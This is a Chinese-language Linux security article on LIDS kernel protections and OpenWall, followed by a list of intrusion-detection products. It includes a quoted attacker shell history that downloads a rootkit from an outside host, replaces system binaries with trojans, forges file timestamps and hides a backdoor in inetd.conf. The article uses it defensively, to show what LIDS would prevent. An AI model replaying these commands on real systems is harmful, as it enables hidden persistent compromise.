快速的瀏覽LIDS的文檔就可以了解LIDS的一系列特性。而我認為下面的這些特性是最重要的：

　　CAP_LINUX_IMMUTABLE 當文件和外那間系統(tǒng)被標識"immutable"防止被寫； CAP_NET_ADMIN 防止篡改網(wǎng)絡配置（例如：防止路由表被修改）；

　　CAP_SYS_MODULE 防止內(nèi)核模塊被插入或者移除；CAP_SYS_RAWIO 防止損壞磁盤或者設備I/O；

　　CAP_SYS_ADMIN 防止大范圍的使用其他系統(tǒng)功能；

　　INIT_CHILDREN_LOCK which prevents child processes of the init() master process from being tampered with.

　　無論在哪個點，上面這些特性都能夠通過命令"lidsadm -I"來啟動，通過"lidsadm -S"來禁用（可以允許真正的系統(tǒng)管理員來進行系統(tǒng)配置），同時提供已經(jīng)安裝在內(nèi)核中的LIDS口令（是通過RipeMD-160加密的）。

　　剖析一次入侵

　　當黑客把一些系統(tǒng)守護進程的緩沖區(qū)溢出以后就可以獲得root權(quán)限，這個時候就是主機被入侵了（事實上是不可能發(fā)生的，但是安裝Linux系統(tǒng)的人忘記了打上RedHat最新的關于緩沖區(qū)溢出的補丁程序，并且讓系統(tǒng)一直運行著）。當然一些黑客也不夠小心，當他們侵入主機后，很急切的獲得了shell，但是他們經(jīng)常沒有考慮到BASH的命令將會被存入系統(tǒng)日志文件中，簡單的閱讀/.bash_history就可以了解黑客到底怎么機器上面作了一些什么事情。這個文件我們可以看看（為了更加簡單我們做過一些細微的修改）： mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21

　　cd /usr/lib/...
　　mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
　　mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
　　mv tcpd.gz? tcpd.gz
　　gzip -d *
　　chmod +x *
　　mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
　　mv pt07 /usr/lib/; mv pstree /usr/bin ;
　　/usr/lib/pt07
　　touch -t 199910122110 /usr/lib/pt07
　　touch -t 199910122110 /usr/sbin/syslogd
　　touch -t 199910122110 /usr/sbin/tcpd
　　touch -t 199910122110 /bin/ps
　　touch -t 199910122110 /bin/netstat
　　touch -t 199910122110 /usr/bin/pstree
　　cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
　　mv /tmp/b /etc/inetd.conf
　　killall -HUP inetd

　　通讀這些內(nèi)容，我們就可以了解下面的一些動作：

　　系統(tǒng)中建立了一個名字異常的目錄（/usr/lib），接著黑客telnet到了自己的主機上面（200.192.58.201，是Brazil某個地方的撥號用戶），同時下載了一套黑客工具。這些黑客工具尸沒有經(jīng)過壓縮的，中間的一些特洛伊二進制程序被安裝到了系統(tǒng)中了，這些特洛伊程序覆蓋了系統(tǒng)的netstat，ps， tcpd， syslogd和pstree命令。這些程序是用來報告系統(tǒng)有那些進程正在運行，那些端口是打開的。

　　我們從中能學到什么呢？

　　首先，LIDS是不能阻止一次入侵的，黑客連接上主機通過緩沖區(qū)溢出的方式獲得系統(tǒng)的root權(quán)限。一旦系統(tǒng)沒有黑客入侵，我們看看LIDS是如何使破壞降到最低的。

　　LIDS通過CAP_LINUX_IMMUTABLE選項可以防止特洛尹程序被寫入到/bin，/usr/bin，/usr/sbin和/usr/lib目錄中。這些目錄我們一般都會標識為不可變的（chattr +i），因而也不會被修改。我們可以注意到，就算不使用LIDS，也可以通過chattr +I命令來標識目錄為不可變的，但是如果是通過LIDS以后，即使是root也不能篡改不可變標識位。類似的，如果文件通過chattr +I被標識為，touck -t這個命令也會失敗。甚至第一行的"mkdir /etc/lib"這個命令也會失敗，如果我們標識文件為不可讀的話。

　　LIDS不能防止黑客入侵，但是可以防止入侵的黑客在侵入后進行很大的系統(tǒng)破壞。一個后門程序可以被安裝上系統(tǒng)，但是沒有特洛亦版本的ps，netstat和pstree能夠很早的發(fā)現(xiàn)這個后門進程，然后kill之。如果沒有LIDS，我們不可能知道黑客通過這個后門程序會做一些什么事情，我們唯一能夠進行挽回的工作就是重裝系統(tǒng)。

　　OpenWall和LIDS----額外的層

　　另外一個和LIDS相似的系統(tǒng)是OpenWall工程。OpenWall工程在很多地方和LIDS不一樣，有一個OpenWall的特別的補丁就是使棧區(qū)為不可執(zhí)行。下面是摘自OpenWall的README文檔里面的申明：

　　大多數(shù)緩沖區(qū)溢出攻擊都是基于覆蓋一些隨意的程序片段中的函數(shù)返回值在堆棧中的地址，如果堆棧為不可執(zhí)行，那么緩沖區(qū)溢出的弱點將會變得很難攻擊。另外一種緩沖區(qū)溢出的方式是在libc中指出一個函數(shù)的返回地址，通常是system()。這個補丁通過修改mmap()化的共享庫，使其總是一個零字節(jié)的文件。這樣使其不能再指定一些數(shù)據(jù)，在很多攻擊中不得不使用ASCIIZ字符串。

　　最近，在LIDS的網(wǎng)上上有一些完整的LIDS＋OpenWall的內(nèi)核補丁，這樣可以提供LIDS和OpenWall都具備的特性。

　　在Linux系統(tǒng)中，通過使用這一系列的多層的安全措施，可以防止很大范圍的攻擊，同時還可以防止入侵或者篡改。系統(tǒng)被黑客入侵口就是網(wǎng)絡接口，在網(wǎng)絡接口，系統(tǒng)內(nèi)核上我們都可以防止他人的入侵。意識到系統(tǒng)中的一些潛在的安全漏洞。任何運行在系統(tǒng)上的守護進程或者服務，不管是root用戶還是非root用戶運行的，都能夠成為一個潛在的安全威脅。充分準備好面對這些威脅。

　　入侵監(jiān)測系統(tǒng)軟件

　　突出的IDS廠商包括Axent，ISS和Platinum Technology。在你選擇產(chǎn)品時，請充分考慮哪一款產(chǎn)品更適合你的公司。有些產(chǎn)品具有優(yōu)秀的圖形界面，很容易使用。其它產(chǎn)品可能更具有擴展性。下列是部分廠商列表：

　　·Axent Intruder Alert(http://www.axent.com/)Cisco NetRanger(http://www.cisco.com/)
　　·ISS RealSecure(http://www.iss.net/)
　　·Computer Associates’ eTrust Intrusion Detection(formerly SessionWall 3)
　　·Computer Misuse Detection System(http://www.cmds.net/)
　　·Network Flight Recorder(http://www.nfr.com)
　　·Network Associates’ CyberCop Monitor(http://www.networkassociates.com)

　　Intruder Alert

　　Intruder Alert(ITA)是使用管理者/代理結(jié)構(gòu)的功能強大的產(chǎn)品。管理者和代理可以運行于UNIX，NT和Novell網(wǎng)絡中。ITA的第一個優(yōu)點是它可以在許多網(wǎng)絡環(huán)境中應用。由于公司很少只應用單一廠商的產(chǎn)品，所以你選擇的IDS應該可以適用于盡可能多的廠商的產(chǎn)品。

　　ITA的第二個優(yōu)點是其分布式的管理結(jié)構(gòu)。ITA軟件包由兩個服務和三個應用程序組成：

　　·ITA Manager（充當服務，守護進程或Novell的可裝載的模塊）
　　·ITA Agent（充當服務，守護進程或Novell的可裝載的模塊）
　　·ITA Admin（用來配置代理的應用程序）
　　·ITA View（用于查詢代理的程序）
　　·ITA Setup（從管理者域中添加和刪除代理的程序）